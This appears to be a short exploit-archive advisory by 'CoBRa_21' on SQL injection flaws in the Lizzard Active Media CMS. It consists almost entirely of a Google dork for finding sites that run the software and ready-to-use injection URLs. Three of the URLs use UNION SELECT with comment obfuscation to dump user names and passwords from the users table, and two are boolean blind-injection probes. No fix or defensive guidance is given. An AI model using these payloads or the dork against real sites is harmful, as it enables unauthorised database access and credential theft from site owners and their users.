-------------------------------------------------------------------------------------------

Lizzard Active Media Multiple SQL Injection Vulnerabilities
 
-------------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Script Home: http://www.lizzard.gr/

Dork: powered by Lizzard Active Media

-------------------------------------------------------------------------------------------
 
Sql Injection:
 
http://localhost/[path]/newsdetail.php?lang=2&nws_id=-8/**/union/**/select/**/0,1,2,3,4,group_concat(name,0x3a,password),6,7,8,93,10,11/**/from/**/users

 
http://localhost/[path]/actdetail.php?prg_id=-21/**/union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(name,0x3a,password),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/**/from/**/users

 
http://localhost/[path]/pressdetail.php?lang=&prs_id=61/**/union/**/select/**/0,1,2,group_concat(name,0x3a,password),4,5,6,7/**/from/**/users

 
http://localhost/[path]/progvisitors.php?ptype=1/**/and/**/1=2

http://localhost/[path]/progvisitors.php?ptype=1/**/and/**/1=1